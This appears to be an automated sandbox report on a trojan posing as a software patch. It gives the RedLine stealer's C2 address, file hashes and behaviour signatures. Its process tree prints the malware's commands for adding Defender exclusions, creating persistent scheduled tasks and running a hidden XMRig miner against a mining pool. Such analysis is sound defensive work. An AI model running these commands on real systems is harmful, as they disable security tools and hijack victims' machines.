Analysis
-
max time kernel
148s -
max time network
159s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
21-10-2021 13:52
Static task
static1
Behavioral task
behavioral1
Sample
Software patch by Sylox.exe
Resource
win7-en-20210920
General
-
Target
Software patch by Sylox.exe
-
Size
3.2MB
-
MD5
32da7dfc115619bf8a6197ec22b75edf
-
SHA1
6118bde049e88592ff92464788c63992a96ece13
-
SHA256
ea152bfedb88c978ab9730ab0f6c9f4baed1777e33d5a6e25c3d542b5c39bb61
-
SHA512
c2a522312fe8bcbe092c6dd46e6e34c53e0d9bf58bccea1f9de1e96b06c0f08d452e0c000a46f34b1cc5bbe22df866243edd17450c1a2ddf43854ddba26864a1
Malware Config
Extracted
redline
@faqu_1
95.181.152.6:46927
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/988-73-0x0000000000360000-0x000000000038E000-memory.dmp family_redline behavioral1/memory/988-79-0x0000000001EC0000-0x0000000001ED9000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 12 IoCs
Processes:
resource yara_rule behavioral1/memory/924-175-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/924-178-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/924-181-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/924-183-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/924-184-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/924-185-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/924-186-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/924-187-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/924-189-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/924-194-0x000000014030F3F8-mapping.dmp xmrig behavioral1/memory/924-192-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/924-198-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
Processes:
Datafile32.exeDatafile64.exeServer32.exeservices64.exeservices32.exesihost64.exesihost32.exepid process 872 Datafile32.exe 1944 Datafile64.exe 988 Server32.exe 1800 services64.exe 1408 services32.exe 1592 sihost64.exe 1576 sihost32.exe -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Software patch by Sylox.exeDatafile32.exeDatafile64.exeservices64.exeservices32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Software patch by Sylox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Datafile32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Datafile64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion services64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion services32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Software patch by Sylox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Datafile32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Datafile64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion services64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion services32.exe -
Loads dropped DLL 7 IoCs
Processes:
Software patch by Sylox.execmd.execmd.execonhost.execonhost.exepid process 484 Software patch by Sylox.exe 484 Software patch by Sylox.exe 484 Software patch by Sylox.exe 1792 cmd.exe 1676 cmd.exe 1760 conhost.exe 1684 conhost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/484-57-0x0000000000C00000-0x0000000000C01000-memory.dmp themida \Users\Admin\AppData\Local\Temp\Datafile32.exe themida C:\Users\Admin\AppData\Local\Temp\Datafile32.exe themida \Users\Admin\AppData\Local\Temp\Datafile64.exe themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida behavioral1/memory/872-67-0x0000000000400000-0x0000000000E48000-memory.dmp themida behavioral1/memory/1944-72-0x0000000000400000-0x0000000000EAE000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida C:\Users\Admin\AppData\Local\Temp\Datafile32.exe themida \Windows\System32\services64.exe themida C:\Windows\System32\services64.exe themida behavioral1/memory/1800-144-0x0000000000400000-0x0000000000EAE000-memory.dmp themida \Windows\System32\services32.exe themida C:\Windows\System32\services32.exe themida behavioral1/memory/1408-150-0x0000000000400000-0x0000000000E48000-memory.dmp themida C:\Windows\system32\services64.exe themida C:\Windows\system32\services32.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
services64.exeservices32.exeSoftware patch by Sylox.exeDatafile32.exeDatafile64.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA services64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA services32.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Software patch by Sylox.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Datafile32.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Datafile64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 15 IoCs
Processes:
powershell.exepowershell.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.execonhost.execonhost.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\services32.exe conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\services32.exe conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.exe conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
Software patch by Sylox.exeDatafile32.exeDatafile64.exeservices64.exeservices32.exepid process 484 Software patch by Sylox.exe 872 Datafile32.exe 1944 Datafile64.exe 1800 services64.exe 1408 services32.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 1760 set thread context of 924 1760 conhost.exe nslookup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1908 schtasks.exe 1636 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
Processes:
Server32.execonhost.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exenslookup.exepowershell.exepid process 988 Server32.exe 1152 conhost.exe 1404 conhost.exe 1444 powershell.exe 840 powershell.exe 1492 powershell.exe 1656 powershell.exe 1760 conhost.exe 1760 conhost.exe 1168 powershell.exe 1752 powershell.exe 1684 conhost.exe 1684 conhost.exe 528 powershell.exe 924 nslookup.exe 1604 powershell.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe 924 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
Software patch by Sylox.exeServer32.execonhost.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exenslookup.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 484 Software patch by Sylox.exe Token: SeDebugPrivilege 988 Server32.exe Token: SeDebugPrivilege 1152 conhost.exe Token: SeDebugPrivilege 1404 conhost.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 840 powershell.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeDebugPrivilege 1760 conhost.exe Token: SeDebugPrivilege 1168 powershell.exe Token: SeDebugPrivilege 1752 powershell.exe Token: SeDebugPrivilege 1684 conhost.exe Token: SeLockMemoryPrivilege 924 nslookup.exe Token: SeLockMemoryPrivilege 924 nslookup.exe Token: SeDebugPrivilege 528 powershell.exe Token: SeDebugPrivilege 1604 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Software patch by Sylox.exeDatafile32.exeDatafile64.execonhost.execonhost.execmd.execmd.execmd.execmd.execmd.execmd.exeservices64.exedescription pid process target process PID 484 wrote to memory of 872 484 Software patch by Sylox.exe Datafile32.exe PID 484 wrote to memory of 872 484 Software patch by Sylox.exe Datafile32.exe PID 484 wrote to memory of 872 484 Software patch by Sylox.exe Datafile32.exe PID 484 wrote to memory of 872 484 Software patch by Sylox.exe Datafile32.exe PID 484 wrote to memory of 1944 484 Software patch by Sylox.exe Datafile64.exe PID 484 wrote to memory of 1944 484 Software patch by Sylox.exe Datafile64.exe PID 484 wrote to memory of 1944 484 Software patch by Sylox.exe Datafile64.exe PID 484 wrote to memory of 1944 484 Software patch by Sylox.exe Datafile64.exe PID 484 wrote to memory of 988 484 Software patch by Sylox.exe Server32.exe PID 484 wrote to memory of 988 484 Software patch by Sylox.exe Server32.exe PID 484 wrote to memory of 988 484 Software patch by Sylox.exe Server32.exe PID 484 wrote to memory of 988 484 Software patch by Sylox.exe Server32.exe PID 872 wrote to memory of 1404 872 Datafile32.exe conhost.exe PID 872 wrote to memory of 1404 872 Datafile32.exe conhost.exe PID 872 wrote to memory of 1404 872 Datafile32.exe conhost.exe PID 872 wrote to memory of 1404 872 Datafile32.exe conhost.exe PID 1944 wrote to memory of 1152 1944 Datafile64.exe conhost.exe PID 1944 wrote to memory of 1152 1944 Datafile64.exe conhost.exe PID 1944 wrote to memory of 1152 1944 Datafile64.exe conhost.exe PID 1944 wrote to memory of 1152 1944 Datafile64.exe conhost.exe PID 1152 wrote to memory of 1668 1152 conhost.exe cmd.exe PID 1152 wrote to memory of 1668 1152 conhost.exe cmd.exe PID 1152 wrote to memory of 1668 1152 conhost.exe cmd.exe PID 1404 wrote to memory of 1008 1404 conhost.exe cmd.exe PID 1404 wrote to memory of 1008 1404 conhost.exe cmd.exe PID 1404 wrote to memory of 1008 1404 conhost.exe cmd.exe PID 1668 wrote to memory of 1444 1668 cmd.exe powershell.exe PID 1668 wrote to memory of 1444 1668 cmd.exe powershell.exe PID 1668 wrote to memory of 1444 1668 cmd.exe powershell.exe PID 1008 wrote to memory of 840 1008 cmd.exe powershell.exe PID 1008 wrote to memory of 840 1008 cmd.exe powershell.exe PID 1008 wrote to memory of 840 1008 cmd.exe powershell.exe PID 1152 wrote to memory of 1748 1152 conhost.exe cmd.exe PID 1152 wrote to memory of 1748 1152 conhost.exe cmd.exe PID 1152 wrote to memory of 1748 1152 conhost.exe cmd.exe PID 1748 wrote to memory of 1908 1748 cmd.exe schtasks.exe PID 1748 wrote to memory of 1908 1748 cmd.exe schtasks.exe PID 1748 wrote to memory of 1908 1748 cmd.exe schtasks.exe PID 1404 wrote to memory of 1764 1404 conhost.exe cmd.exe PID 1404 wrote to memory of 1764 1404 conhost.exe cmd.exe PID 1404 wrote to memory of 1764 1404 conhost.exe cmd.exe PID 1764 wrote to memory of 1636 1764 cmd.exe schtasks.exe PID 1764 wrote to memory of 1636 1764 cmd.exe schtasks.exe PID 1764 wrote to memory of 1636 1764 cmd.exe schtasks.exe PID 1008 wrote to memory of 1492 1008 cmd.exe powershell.exe PID 1008 wrote to memory of 1492 1008 cmd.exe powershell.exe PID 1008 wrote to memory of 1492 1008 cmd.exe powershell.exe PID 1668 wrote to memory of 1656 1668 cmd.exe powershell.exe PID 1668 wrote to memory of 1656 1668 cmd.exe powershell.exe PID 1668 wrote to memory of 1656 1668 cmd.exe powershell.exe PID 1152 wrote to memory of 1792 1152 conhost.exe cmd.exe PID 1152 wrote to memory of 1792 1152 conhost.exe cmd.exe PID 1152 wrote to memory of 1792 1152 conhost.exe cmd.exe PID 1792 wrote to memory of 1800 1792 cmd.exe services64.exe PID 1792 wrote to memory of 1800 1792 cmd.exe services64.exe PID 1792 wrote to memory of 1800 1792 cmd.exe services64.exe PID 1404 wrote to memory of 1676 1404 conhost.exe cmd.exe PID 1404 wrote to memory of 1676 1404 conhost.exe cmd.exe PID 1404 wrote to memory of 1676 1404 conhost.exe cmd.exe PID 1676 wrote to memory of 1408 1676 cmd.exe services32.exe PID 1676 wrote to memory of 1408 1676 cmd.exe services32.exe PID 1676 wrote to memory of 1408 1676 cmd.exe services32.exe PID 1800 wrote to memory of 1760 1800 services64.exe conhost.exe PID 1800 wrote to memory of 1760 1800 services64.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software patch by Sylox.exe"C:\Users\Admin\AppData\Local\Temp\Software patch by Sylox.exe"1⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services32.exe"4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services32.exeC:\Windows\system32\services32.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"6⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost32"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"6⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"8⤵
-
C:\Windows\System32\nslookup.exeC:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/HLOYsB6MqZ9V7F19H0MAEc0HL5dHX6oXKZkVMPa+PCA=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Server32.exe"C:\Users\Admin\AppData\Local\Temp\Server32.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
3dddbab9fbf93ab3dbe8c3eebb783472
SHA1aa54ca975e692d541cd7b37054fbc343aba7906e
SHA256e6315f3eb516284f6bdbb69680f5a4ff2ab4ddc6f93e1937830cccbeaa99d038
SHA5128eae2168273a675725df6711dab6519e5787688268a7e9f0a5a80dd15bed77951619e274abb5d228b84bd527646b414e345781a4f8c743551b8532d9c6eaa5b8
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
3dddbab9fbf93ab3dbe8c3eebb783472
SHA1aa54ca975e692d541cd7b37054fbc343aba7906e
SHA256e6315f3eb516284f6bdbb69680f5a4ff2ab4ddc6f93e1937830cccbeaa99d038
SHA5128eae2168273a675725df6711dab6519e5787688268a7e9f0a5a80dd15bed77951619e274abb5d228b84bd527646b414e345781a4f8c743551b8532d9c6eaa5b8
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
7066ed03efd072ba5c0d9479c4dd23c1
SHA1064dfe6c112b419a5822c2fc3d5cdcc296f76fae
SHA256fe528fc9917783284421b45f302fc62f5058d40a9156fabeed1f7771478b24c8
SHA512e0d9684809b32046ef115c1cdb851d00d0d31be6a79219e656b4c7a42ad690d1a6f60049a9589261e03198c07532db5ed1500128ab4c3c9f60c228c13d03e10b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
7f1fa94404121ed46d41e4f7e7e4db36
SHA149f0873590a70b74cba6d802c093b5d82991ea63
SHA25643d92d93f604d101bb1843c2f52476de96016fda99f8d8b9e0e544a180750b8e
SHA51211a3ea134cd39ae62bddd2a3a80136089949fb8480d0acac1df3071ee35435efd3dcdf7962a871d7445e1505f92e12ec5a6c958fba5eb9c5f65d31940a1bc928
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
7f1fa94404121ed46d41e4f7e7e4db36
SHA149f0873590a70b74cba6d802c093b5d82991ea63
SHA25643d92d93f604d101bb1843c2f52476de96016fda99f8d8b9e0e544a180750b8e
SHA51211a3ea134cd39ae62bddd2a3a80136089949fb8480d0acac1df3071ee35435efd3dcdf7962a871d7445e1505f92e12ec5a6c958fba5eb9c5f65d31940a1bc928
-
